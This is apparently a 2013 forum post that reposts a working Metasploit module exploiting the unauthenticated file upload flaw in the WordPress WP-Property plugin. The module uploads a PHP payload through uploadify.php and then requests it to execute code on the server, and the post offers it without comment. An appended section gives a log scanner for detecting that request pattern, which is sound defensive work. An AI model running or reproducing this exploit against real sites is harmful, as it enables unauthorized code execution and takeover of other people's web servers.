WordPress WP-Property PHP File Upload Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I mean, it's msf.
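
For defenders, the request sequence the module above produces (a direct request to uploadify.php, a POST to it, then a request for a new .php file in the same directory) can be looked for in web server access logs. The following is an added example, not part of the original post or of the Metasploit module; it assumes the "combined" log format, and the `KNOWN_PHP` allowlist, the finding names and the sample log lines are constructed for illustration.

```ruby
# Added example (not from the original post): flag the upload-then-request
# pattern of this module in web server access logs ("combined" format assumed).
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
# Assumption: PHP files the plugin legitimately ships in that directory.
# Adjust to match the files in your installed copy.
KNOWN_PHP = %w[uploadify.php].freeze
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<verb>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /

# Returns an array of findings, each {ip:, kind:, path:}.
def scan_access_log(lines)
  uploaders = {} # client IPs that have POSTed to uploadify.php
  findings = []
  lines.each do |line|
    m = LOG_LINE.match(line) or next
    path = m[:path].split('?').first.to_s
    idx = path.index(UPLOADIFY_DIR) or next
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    kind =
      if file == 'uploadify.php' && m[:verb] == 'POST'
        uploaders[m[:ip]] = true
        m[:status] == '200' ? :upload_accepted : :upload_attempt
      elsif file == 'uploadify.php'
        :uploader_probe # direct GET/HEAD of the upload handler
      elsif file =~ /\.php\z/i && !KNOWN_PHP.include?(file)
        # A PHP file that is not part of the plugin is being requested
        uploaders[m[:ip]] ? :uploaded_php_requested : :unexpected_php_requested
      end
    findings << { ip: m[:ip], kind: kind, path: path } if kind
  end
  findings
end

# Constructed sample log lines (documentation IP ranges, made-up file name).
U = '/wordpress/wp-content/plugins/wp-property/third-party/uploadify/'
SAMPLE_LOG = [
  '198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  "192.0.2.10 - - [04/Jan/2013:19:41:12 +0800] \"GET #{U}uploadify.php HTTP/1.1\" 200 0 \"-\" \"-\"",
  "192.0.2.10 - - [04/Jan/2013:19:41:13 +0800] \"POST #{U}uploadify.php HTTP/1.1\" 200 83 \"-\" \"-\"",
  "192.0.2.10 - - [04/Jan/2013:19:41:14 +0800] \"GET #{U}abcde.php HTTP/1.1\" 200 0 \"-\" \"-\""
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each { |f| puts "#{f[:ip]} #{f[:kind]} #{f[:path]}" }
end
```

Any `:upload_accepted` finding followed by `:uploaded_php_requested` from the same client warrants checking the uploadify directory on disk for files that are not part of the plugin.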